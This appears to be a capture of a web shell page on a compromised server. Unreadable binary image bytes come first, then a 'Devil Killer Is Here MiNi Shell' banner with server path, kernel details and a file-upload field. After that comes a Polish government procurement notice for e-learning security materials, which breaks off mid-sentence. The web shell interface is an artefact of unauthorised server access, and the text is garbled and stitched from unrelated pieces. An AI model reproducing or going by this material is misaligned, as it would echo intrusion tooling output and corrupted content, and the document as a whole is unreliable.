JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220128/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220128/0003923301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Zakup materiałów e-learningowych dla 2 obszarów tematycznych dla użytkow. wewn. oraz dla 2obszarów tematycznych dla użytkow. zewn., na podst. przekazanego przez Zamawiającego „wsadu” merytorycznego. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Główny Urząd Statystyczny</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000331501</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Al. Niepodległości 208</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-925</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">m.brzychcy@stat.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.stat.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup materiałów e-learningowych dla 2 obszarów tematycznych dla użytkow. wewn. oraz dla 2obszarów tematycznych dla użytkow. zewn., na podst. przekazanego przez Zamawiającego „wsadu” merytorycznego. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ccfd1181-7cfd-11ec-83b1-bea871b78b5b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00039233</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-01-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002859/10/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">2.3.17 Kontraktowanie zakupu i przygotowania szkoleń e-learningowych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Zamówienie jest współfinansowane ze środków Unii Europejskiej w ramach programu operacyjnego Polska cyfrowa, 2 oś priorytetowa „E-administracja i otwarty rząd”, 2.2 „Cyfryzacja procesów back-office w administracji rządowej”, współfinansowanego przez Unię Europejską, na podstawie podpisanego w dniu 28 lutego 2019 r. porozumienia o dofinansowanie nr POPC.02.02.00-00-0018/18-00. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://zamowienia-gus.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">http://zamowienia-gus.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu:<br/>1) Platformy dostępnej pod adresem: http://zamowienia-gus.ezamawiajacy.pl,<br/>2) poczty elektronicznej. 2. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów<br/>elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy<br/>ich użyciu opisane zostały w Instrukcji dla Wykonawców korzystających z Platformy. W przypadku<br/>jakichkolwiek wątpliwości związanych z zasadami korzystania z Platformy, Wykonawca winien<br/>skontaktować się z dostawcą rozwiązania teleinformatycznego Platforma zakupowa tel. +48 22 576 87<br/>90 (infolinia dostępna w dni robocze, w godzinach 9.00-17.00), e-mail: oneplace@marketplanet.pl. 3.<br/>Niezbędne wymagania sprzętowo - aplikacyjne umożliwiające komunikację pomiędzy Zamawiającym a<br/>Wykonawcą, w przypadku korzystania z Platformy, określone zostały w pkt 10.3 SWZ. 4.<br/>Dopuszczalna wielkość plików przesyłanych za pośrednictwem Platformy wynosi do 100 MB. 5.<br/>Dokumentacja przedmiotowego postępowania została opublikowana na: 1) stronie internetowej<br/>Zamawiającego pod adresem: http://bip.stat.gov.pl/ogloszenia/zamowienia-publiczne/przetargi/ oraz 2)<br/>na Platformie pod adresem: http://zamowienia-gus.ezamawiajacy.pl. W celu zapoznania się z<br/>dokumentacją postępowania wykonawca po przejściu na ww. adres<br/>Platformy: a) do upływu terminu składania ofert przechodzi do zakładki „Lista ogłoszeń o<br/>postępowaniach”, wybiera zakładkę „Aktualne” i wyszukuje przedmiotowe postępowanie a następnie<br/>klikając w wiersz postępowania, przechodzi do obszaru postępowania. Wykonawca ma możliwość<br/>pobrania każdego dokumentu odrębnie po naciśnięciu na wybrany załącznik lub w formieskompresowanej paczki po zaznaczeniu wybranych dokumentów.<br/>b) po upływie terminu składania ofert przechodzi do zakładki „Lista ogłoszeń o postępowaniach”,<br/>wybiera zakładkę „Archiwalne”, wyszukuje przedmiotowe postępowanie, a następnie klikając w wiersz<br/>postępowania, przechodzi do obszaru postępowania. 6. Dokumenty elektroniczne, oświadczenia lub<br/>elektroniczne kopie dokumentów lub oświadczeń składane są przez Wykonawcę za pośrednictwem: 1)<br/>Platformy, po zalogowaniu się przez Wykonawcę na konto użytkownika, w zakładce „Korespondencja”.<br/>Wykonawcy, w celu bezproblemowej komunikacji z Zamawiającym na Platformie powinni przed<br/>upływem terminu składania ofert przystąpić do postępowania na Platformie poprzez funkcjonalność<br/>„Przystąp do postępowania” oraz posiadać założone konto w aplikacji Marketplanet OnePlace. Po<br/>przystąpieniu do postępowania Platforma przekieruje wykonawcę na stronę logowania się. W celu<br/>zalogowania się należy padać dane użytkownika: e-mail oraz hasło. W przypadku, gdy Wykonawca nie<br/>posiada konta użytkownika, wypełnia formularz rejestracyjny dostępny po kliknięciu funkcjonalności<br/>„Załóż konto za darmo”. Następnie Wykonawca postępuje zgodnie ze wskazówkami Marketplanet<br/>OnePlace, które otrzyma na wskazany w formularzu rejestracyjnym adres e-mail. Założenie konta<br/>Wykonawcy w aplikacji Marketplanet OnePlace wymaga akceptacji „Regulaminu korzystania z<br/>Marketplanet OnePlace”. Rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych. W związku z<br/>tym Zamawiający zaleca Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie<br/>złożenia Oferty w postaci elektronicznej. 2) za pośrednictwem poczty elektronicznej, na wskazane w<br/>pkt 10.14 SWZ adresy e-mail.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">W związku z realizacją wymogów rozp. Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w spr. ochrony osób fiz. w zw. z przetw.<br/>danych osob. i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE<br/>(RODO), admin. informuje o zasadach oraz o przysługujących Pani/Panu prawach zw. z przetw.<br/>Pani/Pana danych osob. I.Administrator – Adm. Pani/Pana danych osob. jest Główny Urząd<br/>Statystyczny z siedzibą al. Niepodległości 208, 00-925 Warszawa. II.Inspektor ochrony danych - Z<br/>inspektorem ochrony danych (IOD) może się Pani/Pan kontaktować:1.pocztą tradycyjną na adres: IOD<br/>GUS, al. Niepodległości 208, 00-925 Warszawa,2.pocztą elektr. na adres e-mail:<br/>IODGUS@stat.gov.pl. Do IOD należy kierować wyłącznie sprawy dot. przetw. Pani/Pana danych osob.<br/>przez admin., w tym realizacji Pani/Pana praw wynikających z RODO. III.Cele oraz podstawa prawna<br/>przetw. Pani/Pana danych osob. - Pani/Pana dane osob. będą przetw. celem zawarcia i prawidłowej<br/>realizacji um. nr 21/ST/KSZBI/POPC/PN/2021. Podstawą prawną przetw. danych jest: a)w zakresie<br/>osób będących<br/>Stroną Um.:-art. 6 ust. 1 lit b RODO - przetw. jest niezbędne do wykonania um., której stroną jest<br/>osoba, której dane dotyczą, lub do podjęcia działań na żądanie osoby, której dane dot., przed<br/>zawarciem um.; -art. 6 ust. 1 lit c RODO - przetw. jest niezbędne do wypełnienia obowiązku prawnego<br/>ciążącego na adm. w związku z przepisami ustawy z dnia 11 września 2019 r. – Pzp (Dz. U. z 2021 r.<br/>poz. 1121), przepisami ustawy z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach<br/>(Dz. U. z 2020 r. poz. 164) oraz rozporządzenia w sprawie klasyfikowania i kwalifikowania<br/>dokumentacji, przekazywania mat. archiwalnych (Dz. U. z 2019 poz. 246) oraz przepisami ustawy z<br/>dnia 6 września 2001 r. o dostępie do informacji publicznej (Dz. U. z 2020 r. poz. 2176) oraz w związku<br/>z przepisami prawa podatkowego; b) w zakresie osób niebędących Stroną Um., ale biorących udział w<br/>jej realizacji: - art. 6 ust. 1 lit c RODO - przetw.jest niezbędne do wypełnienia obowiązku prawnego<br/>ciążącego na admin. w związku z przepisami ustawy z dnia 11 września 2019 r–Pzp (Dz. U. z 2021 r.<br/>poz. 1129), przepisami ustawy z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach (Dz. U. z 2020 r. poz. 164) oraz rozp. w sprawie klasyfikowania i kwalifikowania dokumentacji, przekaz.<br/>materiałów archiwalnych (Dz. U. z 2019 poz. 246) oraz przepisami ustawy z dnia 6 września 2001 r. o<br/>dostępie do inf.publicznej (Dz. U. z 2020 r. poz. 2176) oraz w związku z przepisami prawa<br/>podatkowego; -art. 6 ust. 1 lit. f RODO - przetw. jest niezbędne do celów wynikających z prawnie<br/>uzasadnionych interesów realizowanych przez adm., to jest do umożliwienia prawidłowej realizacji um.<br/>miedzy Stronami. IV.Odbiorcy danych osob.-Odbiorcą Pani/Pana danych osob. będą podmioty<br/>współpracujące z adm., w tym dostawcy usług technicznych i organizacyjnych umożliwiających<br/>wykonanie um. oraz przechowywanie dokumentacji jej dotyczącej, osoby i podmioty upoważn. na<br/>podst.przepisów prawa powszechnie obowiązującego. V.Okres przechow.danych osob. Pani/Pana<br/>dane osobowe będą przechowywane: 1.przez okres realizacji umowy oraz maksymalnie przez okres 6<br/>letni od upływu daty wymagalności roszczenia cywilnoprawnego za zasadach określonych w ustawie z<br/>dnia z dnia 23 kwietnia 1964 r. - Kodeks cywilny (Dz. U. z 2020 r. poz. 1740, z późn. zm.); 2.po okresie,<br/>o którym mowa w pkt 1, w celach archiwalnych zgodnie z przep.ustawy z dnia 14 lipca 1983 r. o<br/>narodowym zasobie archiwalnym i archiwach (Dz. U. z 2020 r. poz. 164) oraz w rozporz. w sprawie<br/>klasyfikowania i kwalifikowania dokumentacji, przekazywania materiałów archiwalnych (Dz. U. z 2019<br/>poz. 246).<br/>Pełna treść informacji dot. przetwarzania danych osobowych w związku z postępowaniem o udzielenie<br/>zamówienia publicznego została określona w pkt 1.16 SWZ dostępnej na stronie internetowej<br/>Zamawiającego https://bip.stat.gov.pl/ .</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">29/ST/KSZBI/POPC/PN/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 20962,06 EUR </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Materiały elearningowe zostaną przygotowane przez Wykonawcę do obszarów tematycznych, zgodnie z poniższym zestawieniem:<br/>1. Bezpieczny pracownik w cyberprzestrzeni – dla użytkowników wewnętrznych<br/>2. Bezpieczeństwo informacji w statystyce publicznej – dla użytkowników wewnętrznych<br/>3. Ochrona danych – dla użytkowników zewnętrznych<br/>4. Bezpieczeństwo informacji w statystyce publicznej – dla użytkowników zewnętrznych<br/>Przygotowywane materiały elearningowe będą się składały z prezentacji do poszczególnych obszarów, skryptu, który będzie zawierał opis wszystkich ekranów dla prezentacji przygotowywanych dla poszczególnych obszarów oraz opracowań graficznych zawierających schematy postępowań i syntetyczne treści z zakresu omawianych obszarów. Przedmiot zamówienia zostanie zrealizowany w terminie nie dłuższym niż 60 dni liczone od dnia podpisania umowy w zakresie przygotowania materiałów. Treść merytoryczna materiałów<br/>elearningowych będzie podlegać aktualizacji przez Wykonawcę w ramach 12 miesięcznej gwarancji (maksymalnie 1 raz w miesiącu) liczone od momentu zaakceptowania przez Zamawiającego dostarczonych materiałów elearningowych. Aktualizacja materiałów będzie odbywała się na wniosek Zamawiającego, przesyłany drogą elektroniczną (e-mail). Czas reakcji<br/>Wykonawcy na zgłoszenie, obejmujący czas ustalenia harmonogramu aktualizacji wynosi 6 dni roboczych. Czas realizacji wniosku Zamawiającego będzie zależał od zakresu aktualizacji, ale nie może być dłuższy niż 12 dni roboczych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą, uznana zostanie oferta, która uzyskała<br/>najwyższą sumaryczną liczbę punktów za wszystkie kryteria według następującego wzoru:<br/>P = C + W + S</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zgodność z WCAG 2.2 – „W”</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Skrócony czas realizacji wniosku o aktualizację materiałów e-learningowych – „S”</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. W odniesieniu do warunku dotyczącego zdolności do występowania w obrocie gospodarczym Zamawiający wymaga, aby Wykonawcy prowadzący działalność gospodarczą lub zawodową byli wpisani do jednego z rejestrów zawodowych lub handlowych prowadzonych w kraju, w<br/>którym mają siedzibę lub miejsce zamieszkania. Zmawiający zastrzega sobie możliwość weryfikacji wpisu do jednego z rejestrów zawodowych lub handlowych prowadzonych w kraju, w którym Wykonawcy mają siedzibę lub miejsce zamieszkania.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonali co najmniej 1 usługę polegającą na wykonaniu materiałów elearningowych z zakresu bezpieczeństwa w cyberprzestrzeni lub bezpieczeństwa informacji lub ochrony danych. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamaw. przed udzieleniem zamów., wezwie Wyk., którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 10 dni terminie, aktualnych na dzień złożenia nast.podmiot. środków dowod.:<br/>1)infor. z KRK o w zakresie określonym w: 1)art. 108 ust. 1 pkt 1 i 2 ustawy z dnia 11 września 2019 r. – Pzp, zwanej dalej „ustawą”, 2)art. 108 ust. 1 pkt 4 ustawy, dot.orzeczenia zakazu ubiegania się o zam. publ. tytułem środ. kar., 2)oświad. wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku<br/>przynależności do tej samej grupy kapi. w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów , z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej<br/>grupy kapit. wraz z dok. lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postęp.niezależnie od innego wykonawcy należącego do tej samej grupy kapita.; 3)zaśw. właściwego naczelnika US potwierdzającego, że wykon. nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy, a w przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia dok.<br/>potwierdzających, że odpowie. przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wyko. dokonał płatności należnych<br/>podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące poroz. w sprawie spłat tych należności; 4)zaświad. albo innego doku. właściwej terenowej jednostki org. ZUS lub właściwego oddziału reg.lub<br/>właściwej placówki terenowej KRUS potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezp. społ. i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy, a w przypadku zalegania z opłacaniem składek na ubezp. społ. lub zdrowotne wraz z zaświa. albo innym dokume. zamawiający<br/>żąda złożenia dok. potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępo. albo przed upływem terminu składania ofert wykonawca dokonał<br/>płatności należnych składek na ubezp. społe. lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące poroz. w sprawie spłat tych należności; 5)odpisu lub informacji z KRS lub z CEIDG, w zakresie art. 109 ust. 1 pkt 4 ustawy, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,<br/>6)oświad. wykonawcy o aktualności informacji zawartych w ośw., o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postęp. wskazanych przez zamaw., o których mowa w:a)art. 108 ust. 1 pkt 3 ustawy,<br/>b)art. 108 ust. 1 pkt 4 ustawy, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego,c)art. 108 ust. 1 pkt 5 ustawy, dotyczących zawarcia z innymi wyko. porozum. mającego na celu zakłócenie konkurencji,d)art. 108 ust. 